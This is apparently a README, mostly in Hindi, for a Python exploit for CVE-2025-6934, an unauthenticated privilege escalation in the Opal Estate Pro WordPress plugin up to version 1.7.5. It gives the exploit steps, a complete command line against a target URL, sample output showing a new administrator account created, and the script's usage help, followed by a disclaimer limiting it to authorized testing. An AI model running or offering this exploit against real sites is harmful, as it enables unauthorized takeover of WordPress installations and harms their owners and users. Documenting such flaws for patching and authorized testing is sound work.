
Opal Estate Pro <= 1.7.5 - बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
WordPress के लिए Opal Estate Pro – Property Management and Submission प्लगइन, जो FullHouse - Real Estate Responsive WordPress Theme द्वारा उपयोग किया जाता है, 1.7.5 तक के सभी संस्करणों में विशेषाधिकार वृद्धि के लिए असुरक्षित है।
यह Python एक्सप्लॉइट विशेषाधिकार वृद्धि प्रक्रिया को निम्न प्रकार से स्वचालित करता है:
readme.txt के माध्यम से असुरक्षित प्लगइन संस्करण की जाँच करना।python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Plugin Version Check:
[+] Vulnerable version detected: 1.7.5
[•] Exploit Attempt Started
[+] Nonce Found: 70dd70630b
[+] HTTP Status: 200
[✔] Exploit Successful!
--------------------------
Username : nxploitedadmin
Email : [email protected]
Password : nxp1234
Role : administrator
--------------------------
Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://site.com/path/)
-mail, --newmail NEWMAIL
Email to register as admin
-password, --newpassword NEWPASSWORD
Password for new admin user
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
बिना सहमति के लक्ष्यों के विरुद्ध इस उपकरण का अनधिकृत उपयोग सख्त वर्जित है।
द्वारा: Khaled_alenazi (Nxploited)